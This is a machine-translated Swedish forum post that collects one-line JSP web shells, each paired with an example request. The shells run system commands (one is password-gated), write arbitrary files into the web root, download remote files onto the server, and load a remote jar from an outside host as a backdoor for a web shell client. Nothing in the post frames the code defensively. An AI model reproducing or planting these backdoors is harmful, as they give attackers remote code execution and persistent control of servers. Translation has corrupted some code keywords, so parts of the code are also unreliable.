|
|
Publicerad på 2015-01-02 18:46:57
|
|
|
|
Överförd från: http://p2j.cn/?p=1627
1. Utför systemkommandon:
Utför systemkommandon utan eko:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Begäran: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Det kommer inte att finnas något eko efter utförandet, vilket är väldigt smidigt för studsgranater.
Det finns ekon med lösenordsverifiering:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = ny byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); }%>
Begäran: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
2. Koda strängen och skriv den till den angivna filen:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Begäran: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Skriv till webbkatalogen:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Begäran: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Begäran: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Skriv till webbkatalogen:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Begäran: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Ladda ner fjärrfilen (om du inte använder Apache IO utils kan du inte konvertera indataströmmen till byte, så den är väldigt lång...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = nytt byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; medan ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Begäran: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Ladda ner till webbvägen:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = nytt byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; medan ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Begäran: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Fyra: Reflektion kallar den yttre krukan, perfekta bakdörren
Om du ogillar ovanstående bakdörrsfunktion är för svag och föråldrad kan du prova detta:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u")))))).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Begäran: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A
Köksknivsanslutning: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, lösenord 023.
Lösning:
Använd reflektion för att ladda en extern jar i den aktuella applikationen, och reflektion kör resultatet av utdatabehandlingen. request.getParameterMap() innehåller alla begärda parametrar. Eftersom det externa jar-paketet är laddat måste servern kunna komma åt denna jar-adress. |
Föregående:Krisen bakom TXT-textfilenNästa:Java MD5-kryptering, Base64-kryptering och dekryptering Java kör systemkommandons källkod
|
Publicerad på 2015-01-02 20:17:30
|
Hyresvärd|
Publicerad på 2015-01-02 20:39:44
|
